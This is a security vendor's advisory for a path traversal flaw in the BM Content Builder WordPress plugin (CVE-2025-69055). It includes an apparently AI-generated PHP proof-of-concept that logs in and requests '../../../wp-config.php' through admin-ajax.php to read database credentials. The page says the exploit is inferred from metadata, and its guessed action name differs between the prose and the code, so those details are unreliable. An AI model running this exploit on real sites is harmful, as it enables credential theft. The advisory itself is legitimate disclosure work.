Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-69055: BM Content Builder < 3.16.3.3 – Authenticated (Contributor+) Arbitrary File Download (bm-builder)

CVE ID CVE-2025-69055
Plugin bm-builder
Severity Medium (CVSS 6.5)
CWE 22
Vulnerable Version 3.16.3.3
Patched Version
Disclosed December 30, 2025

Analysis Overview

Atomic Edge analysis of CVE-2025-69055 (metadata-based):
This vulnerability is an authenticated path traversal flaw in the BM Content Builder WordPress plugin. It allows users with Contributor-level permissions or higher to read arbitrary files from the server’s filesystem. The vulnerability affects all plugin versions before 3.16.3.3 and has a CVSS score of 6.5 (Medium severity).

The root cause is improper limitation of a pathname to a restricted directory (CWE-22). The plugin likely accepts user-controlled input for a file path parameter and uses it directly in a file read operation without proper validation or sanitization. Atomic Edge research infers the vulnerable code does not normalize or restrict the input path, allowing directory traversal sequences like ‘../’ to escape the intended directory. This conclusion is based on the CWE classification and vulnerability description, not direct code review.

Exploitation requires an authenticated WordPress session with at least Contributor-level access. The attacker would send a request to a plugin-specific endpoint, likely an AJAX handler at /wp-admin/admin-ajax.php. The request would contain an action parameter referencing a plugin function (e.g., action=bm_builder_download) and a file path parameter containing traversal sequences (e.g., file=../../../wp-config.php). The server would then return the contents of the specified file.

Remediation requires implementing proper path validation and sanitization. The patch likely adds input validation to reject paths containing directory traversal sequences. It should also restrict file access to a predefined safe directory, possibly using WordPress’s ABSPATH constant or realpath() with a whitelist check. The fix must also ensure proper capability checks remain in place.

The impact is unauthorized disclosure of sensitive server files. Attackers can read WordPress configuration files (wp-config.php), which contain database credentials and secret keys. They can also access system files (/etc/passwd), log files, and other application source code. This information leakage can facilitate further attacks, including database compromise and privilege escalation.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-69055 - BM Content Builder < 3.16.3.3 - Authenticated (Contributor+) Arbitrary File Download
<?php

$target_url = 'https://example.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// File to download (adjust traversal depth as needed)
$target_file = '../../../wp-config.php';

// Initialize cURL session for login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$login_response = curl_exec($ch);

// Check login success (basic check for dashboard redirect)
if (strpos($login_response, 'Dashboard') === false && strpos($login_response, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}

// Assumed vulnerable AJAX endpoint and action
// The exact action name is inferred from plugin slug 'bm-builder'
$ajax_action = 'bm_builder_download_file';

// Build exploit request to admin-ajax.php
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => $ajax_action,
    'file' => $target_file  // Unvalidated path parameter
]));

$exploit_response = curl_exec($ch);
curl_close($ch);

// Output results
if (!empty($exploit_response)) {
    echo "Exploit attempt completed. Response length: " . strlen($exploit_response) . " bytesn";
    echo "First 500 characters of response:n";
    echo substr($exploit_response, 0, 500) . "n";
    
    // Check for common indicators of successful file read
    if (strpos($exploit_response, 'DB_NAME') !== false || 
        strpos($exploit_response, '<?php') !== false ||
        strpos($exploit_response, 'root:') !== false) {
        echo "SUCCESS: Likely retrieved sensitive file contents.n";
    }
} else {
    echo "No response received. The endpoint or action may be incorrect.n";
}

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School